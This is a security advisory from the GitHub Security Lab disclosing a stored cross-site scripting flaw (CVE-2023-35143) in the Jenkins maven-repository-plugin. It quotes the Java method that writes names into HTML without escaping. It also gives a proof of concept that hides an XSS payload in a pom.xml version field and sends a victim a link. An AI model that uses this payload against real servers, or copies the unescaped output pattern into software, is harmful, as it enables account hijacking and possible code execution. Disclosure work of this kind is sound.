GHSL-2023-097: Cross-Site Scripting (XSS) in maven-repository-plugin - CVE-2023-35143

Coordinated Disclosure Timeline

2023-05-03: Issue reported to the Jenkins Security Team
2023-06-14: Advisory published

Summary

A stored Cross-Site Scripting (XSS) vulnerability was found in the maven-repository-plugin project.

Product

maven-repository-plugin

Tested Version

1.10

Details

Stored Cross-Site Scripting (`GHSL-2023-097`)

The Head#generateDirectoryListing method crafts an HTML response using user-controllable data:

    protected void generateDirectoryListing(IDavContext ctxt, IDavCollection item) throws IOException {
        PrintWriter writer = this.getResponse().getWriter();
        String name = item.getName();
        if( name == null )
            name = "Repository";
        writer.write("<HTML>");
        writer.write("<H1>" + name + "</H1>");
        writer.write("<TABLE>");
        for (IDavItem cItem : item.getChildren(ctxt)) {
            writer.write("<TR>");
            writer.write("<TD>" + cItem.getLastModified().toString() + "</TD>");

            if (cItem instanceof IDavFile) {
                IDavFile file = (IDavFile) cItem;

                writer.write("<TD>" + file.getContentLength() + "</TD>");

                writer.write("<TD><A href='" +  file.getName() + "'>" + file.getName() + "</A></TD>");
                if (file.isLocked(ctxt))
                    writer.write("<TD>(Locked)</TD>");
                else
                    writer.write("<TD></TD>");
            } else {
                IDavCollection dir = (IDavCollection) cItem;


                writer.write("<TD>DIR</TD>");
                writer.write("<TD><A href='" + dir.getName() + "/'>" + dir.getName() + "</A></TD>");
                writer.write("<TD></TD>");
            }
            writer.write("</TR>");
        }
        writer.write("</TABLE>");
        writer.write("</HTML>");
    }

An attacker with Job/Configure permissions is able to create a Maven project and control the value of dir.getName() and file.getName() by controlling the produced Maven artifacts.

Proof of concept

Create a Maven project
Use an SCM source (eg: git) pointing to a project with a malicious pom.xml file: ```xml

4.0.0 com.pwntester payload <![CDATA[<img src=x onerror=alert()>]]> test test

Note that the XSS payload was included in the artifact version.

- Build the project so that the artifacts are produced and stored in the workspace
- Send the victim the following link

http://localhost:8080/jenkins/job/test/1/maven-repository/repository/com/pwntester/payload/ ```

Note: Change test to the project name, 1 to the build number, and com/pwntester/payload to the groupId/artifactId specified in the pom.xml.

Impact

This issue may lead to Cross-Site Scripting and if targeted to an administrator, it can be scaled into Remote Code Execution (RCE).

CVE

CVE-2023-35143

Resources

SECURITY-3156

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-097 in any communication regarding this issue.